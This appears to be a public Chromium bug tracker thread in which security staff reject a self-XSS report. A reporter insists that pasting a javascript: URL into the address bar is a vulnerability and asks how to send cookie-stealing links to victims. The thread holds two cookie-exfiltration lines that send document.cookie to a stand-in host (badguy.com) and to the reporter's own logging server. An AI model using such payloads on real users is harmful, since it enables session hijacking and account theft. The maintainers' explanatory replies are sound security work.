This does not describe an attack against the user. Putting the same HTTP URL in the omnibox without using JavaScript would have the same behavior.

Now, if your repro script were something like

   javascript:window.location.replace("http://badguy.com/?collectdata=" + document.cookie);

...that would indeed take the user's non-HTTPOnly cookies from their current page and send them to the other site. However, this does not represent a vulnerability.

See https://dev.chromium.org/Home/chromium-security/security-faq#TOC-Does-entering-JavaScript:-URLs-in-the-URL-bar-or-running-script-in-the-developer-tools-mean-there-s-an-XSS-vulnerability- for discussion.

man it does and i've test it and you can paste this javascript cod in your browser and your cookies will be sent to my log.txt file 
javascript:window.location.replace("http://www.thebm.ml/invok.php?cookie="  + document.cookie);
it works 100%

Comment #3 deleted, as this is a public-visible issue.

As noted in #1, this does not represent a vulnerability.

See https://dev.chromium.org/Home/chromium-security/security-faq#TOC-Does-entering-JavaScript:-URLs-in-the-URL-bar-or-running-script-in-the-developer-tools-mean-there-s-an-XSS-vulnerability- for discussion.

but why it doesn't represent a vulnerability , i mean when the victim goes to that script his cookies will be stealed and being sent to my server 

It's not a vulnerability because no reasonable user would be willing to run your JavaScript in his browser's address box.

An "unreasonable" user might be willing to do so, but that user would also be willing to visit your website and type his password directly into your site, achieving the same effect. 

ok , is their any thing called xss vulnerability in google chrome ??

hi , maybe you didn't get what i meant about "  is their any thing called xss vulnerability in google chrome ??"  i mean is  xss vulnerabilities can be exploited like the normal websites xss vulnerabilities ? 
please replay , cause am new in this xss browser issue .

Regards ,
Justin

Unfortunately, the Chromium Security team can't really scale to individual instruction on web vulnerability classes. Instead, I can suggest you look through https://sites.google.com/site/bughunteruniversity/, https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29, and the book "The Tangled Web".

OK , nor problem , but i have one last question about my vulnerability 
that i mentioned before ,  would it considered valid if it executed from for example gmail message that being sent to the victim and that link which will sent to the victim contains that cod to steal cookies and as a result that cod will steal the current user session and send it to the attacker , ? would you or google time consider it a valid vulnerability .??

thank you in advance ,

Regards ,

Justin

If a web email client (Gmail/Outlook/YahooMail/etc) allowed a JavaScript link to be sent to a user and the clicking the link resulted in script execution, yes, that would be a security vulnerability in the web mail application, and I expect the product owner would rapidly fix it.

ok thank you but what about sending a link through gmail for example 
and that link once the victim clicks on it his cookies have been stolen 
and sent to the attacker and that link looks like 
http://demo.thebm.ml/test.htm or it should be something like this 
<script>alert('test')</script> that being sent to the victim that would be considered a valid vulnerability ? i mean if it was a link like 
http://demo.thebm.ml/test.htm  that would be considered a valid vulnerability 
or it should be a script ??


Regards, 

Justin 

I encourage you to read through the resources I mentioned in comment #9. 

Web mail clients, as a matter of design, remove links and markup that attempts to execute JavaScript within their application's security context.